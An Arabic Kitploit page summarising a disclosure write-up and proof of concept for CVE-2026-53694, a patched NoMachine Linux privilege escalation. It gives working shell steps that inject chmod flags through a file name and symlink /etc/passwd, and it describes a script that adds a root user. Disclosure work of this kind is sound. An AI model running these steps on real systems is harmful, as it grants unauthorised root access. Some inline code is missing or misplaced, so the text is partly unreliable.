Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53694-NoMachine-LPE — إثبات مفهوم الاستغلال وشرح لـ CVE-2026-53694، وهي ثغرة تصعيد صلاحيات محلية في NoMachine لنظام لينكس عبر حقن الوسائط في nxchmod.sh، مما يسمح بالوصول كجذر من خلال معالجة الروابط الرمزية. | Kitploit
أدوات/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

إثبات مفهوم الاستغلال وشرح لـ CVE-2026-53694، وهي ثغرة تصعيد صلاحيات محلية في NoMachine لنظام لينكس عبر حقن الوسائط في nxchmod.sh، مما يسمح بالوصول كجذر من خلال معالجة الروابط الرمزية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-53694: تصعيد الصلاحيات المحلي في NoMachine عبر حقن الوسائط

CVE Status Target Language

نظرة عامة

يحتوي هذا المستودع على الشرح والإثبات العملي (PoC) لـ CVE-2026-53694، وهي ثغرة تصعيد صلاحيات محلية (LPE) في NoMachine لأنظمة لينكس.

بسبب التعقيم غير الصحيح لمحددات الوسائط في النص البرمجي nxchmod.sh، يمكن لمستخدم محلي غير مميز حقن وسائط في أمر نظام يُنفذ بصلاحيات root. من خلال الجمع بين حقن الوسائط هذا ورابط رمزي، يمكن للمهاجم استبدال ملفات نظام حرجة (مثل /etc/passwd) وتصعيد صلاحياته إلى الجذر.

تم تصحيح هذه الثغرة بالكامل من قبل المطور.

عملية الاكتشاف

كان العثور على هذه الثغرة عملية تجربة وخطأ وإدراك في وقت متأخر من الليل. إليك كيفية تطور الاكتشاف:

  1. مراقبة الهدف: لاحظت أن النص البرمجي /usr/NX/scripts/restricted/nxchmod.sh كان يُنفذ بشكل دوري بواسطة المستخدم الجذر لإدارة الصلاحيات في أدلة معينة.
  2. الفكرة الأولية (الطريق المسدود): رأيت أن النص البرمجي كان يطبق chmod a+rw على الملفات. فكرت: إذا كنت أتحكم في الوجهة، هل يمكنني استخدام رابط رمزي لجعل /etc/passwd قابلًا للكتابة؟ جربت رابطًا رمزيًا عاديًا (ln -s /etc/passwd /tmp/asdf)، لكنه فشل. تمنع بتة الالتصاق (sticky bit) في لينكس على أدلة مثل /tmp المستخدم الجذر من اتباع رابط رمزي أنشأه مستخدم آخر بشكل أعمى.
  3. الاختراق: أثناء مراجعة تنفيذ النص البرمجي لاحقًا، لاحظت كيفية بناء الأمر: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. كان النص البرمجي يأخذ اسم الملف حرفيًا ويمرره مباشرة إلى chmod.
  4. حقن الأوامر عبر اسم الملف: أدركت أنه يمكنني إنشاء ملف بمسافات وأعلام في اسمه. أنشأت ملفًا باسم X1234 -R -L. عندما تم تشغيل النص البرمجي، قام أمر chmod بتوسيع هذا إلى وسائط بدلاً من مسار ملف واحد.
  5. تجاوز بتة الالتصاق: من خلال حقن العلمين -L (اتبع الروابط الرمزية) و (تكراري) في أمر عبر اسم الملف، أجبرت ثنائي نفسه على حل واتباع الرابط الرمزي الذي أنشأته في الدليل، متجاوزًا بذلك حماية بتة الالتصاق تمامًا.

التحليل الفني

تنبع الثغرة من كيفية تعامل NoMachine مع صلاحيات مقابس X11/Wayland. يتم تشغيل النص البرمجي nxchmod.sh بواسطة البرنامج الخفي nxserver.bin الذي يعمل بصلاحيات الجذر.

يبدو التنفيذ المعرض للخطر هكذا:

root@kitploit:~
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

إذا أنشأ المهاجم بنية دليل وملفًا باسم X1234 -R -L، يصبح الأمر الناتج الذي ينفذه الجذر: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

عند وضع رابط رمزي يشير إلى /etc/passwd داخل الدليل X1234، تجبر الوسائط المحقونة -R و -L برنامج chmod على اتباع الرابط الرمزي بشكل تكراري ومنح صلاحيات قراءة/كتابة عالمية للملف الهدف.

متطلبات الاستغلال

لكي ينجح هذا الاستغلال، يجب أن يستوفي النظام المستهدف الشروط التالية:

  • يجب أن يستخدم نظام التشغيل Wayland (وليس X11).
  • يجب أن يكون Xwayland نشطًا.
  • يجب أن تكون جلسة رسومية قيد التشغيل (شاشة تسجيل الدخول كافية).

الإثبات العملي

يمكنك إعادة إنتاج هذه الثغرة إما يدويًا باستخدام أوامر الشل أو تلقائيًا باستخدام النص البرمجي بلغة بايثون المرفق.

الطريقة الأولى: التنفيذ اليدوي (الشل)

انتقل إلى /tmp/.X11-unix/ ونفذ الأوامر التالية لإنشاء بنية الدليل الخبيثة.

root@kitploit:~
cd /tmp/.X11-unix/

# 1. Exploitation setup
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# Wait for nxchmod.sh to execute (can take up to 60 seconds).
# Verify the permissions of /etc/passwd have changed to -rw-rw-rw-
# You can now edit /etc/passwd to add a root user.

بمجرد التحقق من الثغرة وتصعيد الصلاحيات، قم بتشغيل أوامر التنظيف التالية لاستعادة استقرار النظام وإزالة الآثار:

root@kitploit:~
# 2. Cleanup
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

الطريقة الثانية: الاستغلال الآلي

يتم توفير استغلال آلي كامل في poc.py. يتحقق هذا النص البرمجي من متطلبات Wayland، ويجهز الرابط الرمزي، وينتظر دورة تنفيذ nxchmod.sh ويحقن مستخدم جذر جديد (gg) في /etc/passwd.

لتشغيل الاستغلال:

root@kitploit:~
python3 poc.py

المعالجة

تم معالجة هذه الثغرة بواسطة NoMachine. يجب على المستخدمين التحديث إلى الإصدارات التالية أو الأحدث:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

الجدول الزمني

  • 2026-04-20: الإبلاغ عن الثغرة للمطور.
  • 2026-04-23: أكد المطور الثغرة ووافق على الإفصاح المنسق.
  • 2026-05-07: أصدر المطور إصدارات مصححة (9.5.7 و 8.23.2) ونشر تقرير المشكلة TR04X11802.
  • 2026-06-10: نشر CVE-2026-53694 في NVD. (سجل MITRE الرسمي قيد الانتظار حاليًا للتحليل الكامل وتحديثات الإسناد (آخر فحص 2026-07-01))

المراجع

  • تقرير المشكلة TR04X11802 من NoMachine
  • تحديث برنامج NoMachine SU05X00274
  • تحديث برنامج NoMachine SU05X00275
  • NVD - CVE-2026-53694
تنزيل الأداة
-R
chmod
chmod
  • تحقيق تصعيد الصلاحيات المحلي: بمجرد جعل /etc/passwd قابلاً للكتابة (a+rw)، تمكنت ببساطة من إضافة مستخدم جذر جديد إلى الملف والدخول إليه باستخدام su.